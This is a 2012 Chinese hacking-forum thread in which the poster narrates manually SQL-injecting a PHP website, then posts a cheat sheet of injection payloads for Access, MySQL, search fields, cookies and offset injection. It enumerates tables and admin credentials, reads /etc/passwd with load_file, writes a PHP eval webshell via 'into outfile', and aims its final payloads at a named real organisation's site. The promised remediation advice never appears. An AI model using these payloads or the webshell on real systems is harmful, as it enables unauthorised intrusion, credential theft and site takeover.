找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2901|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~# ^- F0 ^7 t, ?! m4 Y
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?4 |( [; @/ A* Y8 b7 {
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
! w" ]+ H' {. r. p如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)0 I: w4 }$ y7 \( _; e4 c
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
, c+ `9 k: @# U3 w5 I+ ^这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
: D$ M) K2 M1 J8 ?Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
3 ^. T( }7 e2 D0 v1 k/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
# P' K( w/ V5 @$ A                        
5 Q7 d* L& R; _" ]3 z- j2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
; b# M" B8 ?% u% J3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
) t  o0 }) }! l  |: k4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息+ A% Y1 h1 k. c- G5 `
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。
6 _4 ^. r1 t% @  r. ]2 F% m有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
5 ~7 S# z; B6 D8 Y1 r/ h2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。! i1 i7 z* s. F6 o0 D7 G4 w$ J
我就用的是第二个思路,2 w0 x, i/ [5 y6 q& T2 q
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
& P; O2 R) U% p4 X: `6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,1 x# F9 ^! O, z7 s$ Z& }
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
% i" r1 a$ d7 e2 ]+ p注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
6 n- y6 }( _3 e; b: S- e7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????6 Q- \  p: v) r1 }5 \8 l
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....% B* \% T7 G2 L3 D9 O# T& r& [
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
4 \! o# }; K0 j& [6 m然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
' d# @% q7 N; I9 G( N( v$ M调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限....../ t9 U% c2 \5 Y! v
下面是一些很普遍注入方式资料:
2 U3 s- ]/ M+ X9 c注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
) K% E: A8 T% R7 @拆半法. K8 b6 _* ^' K6 h9 ]; z
######################################
' T! L# z# F5 K4 Zand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
8 U5 A- L7 f5 [3 {and exists (select * from admin)
* c) p- e, `4 F7 Q5 xand exists(select id from admin)4 C* ?6 u: D: B2 \0 a) [
and exists(select id from admin where id=1)
: }( Y, J( t3 b4 m; `( Tand exists(select id from admin where id>1) # j3 x4 W8 p: N. _
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
; z) _$ l. Y7 d% @9 _4 G0 f/ Hand exists (select username from admin)' @2 H# p. M7 {9 V9 i! {
and exists (select password from admin)
( `" A( {1 p! [$ ~: Wand exists (select id from admin where len(username)<10 and id=1)1 `# Z5 e2 T* E( S) ?, ]
and exists (select id from admin where len(username)>5 and id=1)
# A) ?: T0 a8 P/ B& U, eand exists (select id from admin where len(username)=6 and id=1)$ m9 b: m- `8 Q8 Z
and exists (select id from admin where len(password)<10 and id=1)
" N- [* n! b4 tand exists (select id from admin where len(password)>5 and id=1)9 h- z. l8 l; b/ X3 a% j$ L+ w
and exists (select id from admin where len(password)=7 and id=1): f# k, E1 c5 r
and (select top 1 asc(mid(username,1,1)) from admin)=97
3 l  i4 L) @- ]2 F  U返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。* ]; t. h; B6 ^
猜第二位把username,1,1改成username,2,1就可以了。$ ~5 b2 `9 A1 M/ X* T
猜密码把username改成password就OK了6 u9 s  w' G& ]
##################################################2 i+ n6 b% A/ }+ K
搜索型注入
$ r- }# y0 h5 Q/ x9 s##################################
5 ^/ Y0 j  K0 H2 w# q6 _, b3 u%' and 1=1 and '%'='8 G3 B" k5 w" _3 c0 M! o
%' and exists (select * from admin) and '%'='- E( J3 g" o$ f2 m" t
%' and exists(select id from admin where id=1) and '%'='
. g( f$ C0 y5 S& {%' and exists (select id from admin where len(username)<10 and id=1) and '%'='# T7 P% C+ P) W' h  B
%' and exists (select id from admin where len(password)=7 and id=1) and '%'=') m4 b+ C7 V9 [0 L7 I
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='& A$ g1 m4 H  o+ a
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='! ?9 C' ^% T1 U
对于MSSQL数据库,后面可以吧 and '%'='换成--
3 A* X3 s2 [' F! o  ?/ @还有一点搜索型注入也可以使用union语句。3 q6 F8 n* C2 r; n4 p7 O
########################################################
+ J2 o# I# ]; J( T& c& @  {联合查询。. o+ i  w* a+ t' `+ c3 ^. I
#####################################0 R, [: n& R7 r: N7 L
order by 10! I0 E) m( J: ]/ u  N( {! ^
and 1=2 union select 1,2,3,4,5,6,7,8,9,10  \, n3 _$ G2 S! i( g( ]( x4 C8 P
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin, l. }" ]3 g3 d. Z5 i! c
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
/ J5 V8 J( h- v1 ?8 n很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)+ F9 w' b) @' B) r3 Q% x0 T+ I7 Q
###################################
, P) F7 `: W8 q) z+ s3 ecookie注入% C$ W7 G. S! Z7 G1 w
###############################
" p! G1 v5 U9 r: Q" Whttp://www.******.com/shownews.asp?id=1277 L5 s6 w8 I- B7 ?6 ?4 k6 }% }6 t+ @
http://www.******.com/shownews.asp
8 Q/ a# _( P6 }  valert(="id="+escape("127"));2 [0 U% T4 i$ s1 d, ]
alert(="id="+escape("127 and 1=1"));
5 Y# H4 e. ?1 A2 Oalert(="id="+escape("127 order by 10"));
* O: [+ P& U! e- Ealert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
) P# `4 ~! b! ~2 x3 jalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
5 c: c0 m/ n- c' n" s) f这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
% p' ^+ D9 O  e7 @8 w4 V: h4 d###################################3 A: c1 q& s4 x; w( v0 l
偏移注入
0 T6 c: M! W4 s5 ^. w6 {* |- O###########################################################0 w& U# _4 }: z; u; L
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin1 `1 C( H& W& y! u5 m2 R; t
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin) v- Z3 f9 u2 V, W0 F
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)# l: W2 W2 N6 R' e
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)3 k% x* b- o; ]' _4 S
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
% j  X1 t  l, |9 Z+ X- B, v, y6 hunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)/ Q# v+ y% q' Y$ S
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
  G3 Y+ f* N6 u0 z9 Y* wa.id=d.id)3 g4 P' v3 c' j& J, I
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
+ N  r& m# X9 J5 c$ ~* @and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) ! e8 q" y: x0 B( s$ E
  ' A7 N3 C# v( ^/ W/ K# M
============================================================================================================
, r3 v# ~& D8 e4 M7 b+ Y" Q/ L1.判断版本3 R! \9 |* c. G2 }/ r5 K
and ord(mid(version(),1,1))>51# V; M5 K0 k9 C- ^: r
返回正常,说明大于4.0版本,支持ounion查询7 D. D: ^& U- a6 J# z" C
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解/ N7 [" O3 w) _" C- r5 I
and 2=4 union select 1,2,3,4,5,6,7,8,9--
) H' q2 l- M/ p6 o3.查看数据库版本及当前用户,
' w' d* C% m! e9 Z. Vand 2=4 union select 1,user(),version(),4,5,6,7,8,9--
" d9 n4 w# _3 P, C4 U数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,: S1 Z* I4 f" z
4.判断有没有写权限
8 S3 X4 O7 C2 U8 f4 N6 f3 Eand (select count(*) from MySQL.user)>0--
& T0 V- c( W, M* j# p5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1: `: w% s) A; @
用不了这个命令,就学习土耳其黑客手法,如下4 q# ~8 V7 m: L$ J0 ~6 Z9 v
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
3 D3 [3 x3 }% ?* H& h+ p/ y, o6.爆表,爆库
! D! ]5 p) R! N( y6 @% c' Dand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
! N4 t2 {6 y- s* l- q3 y& s$ V# M7.爆列名,爆表0 P3 V; @2 O8 U
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--7 O2 Q1 h" Y3 V
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。# E# @  t) G3 d) ~7 P
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--+ R: O& u# C$ V& _
9.爆字段内容
# X6 F( T6 B( r# Q/ Qand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--2 q2 j2 X9 h1 M$ l
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表